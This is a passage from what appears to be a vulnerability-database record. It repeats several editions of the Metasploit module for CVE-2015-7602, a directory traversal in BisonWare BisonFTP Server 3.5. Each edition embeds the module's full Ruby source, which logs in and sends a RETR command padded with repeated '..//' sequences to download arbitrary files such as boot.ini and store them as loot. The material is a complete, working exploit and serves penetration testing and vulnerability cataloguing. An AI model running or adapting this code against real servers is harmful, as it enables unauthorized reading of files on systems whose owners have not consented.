Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T17:34:15", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T19:33:32", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T19:33:32", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T21:36:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T21:36:24", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T04:36:28", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T04:36:28", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T06:35:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T06:35:55", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T04:44:20", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T04:44:20", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T06:41:35", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-02-11T06:41:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T06:41:35", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T01:04:59", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T01:04:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory 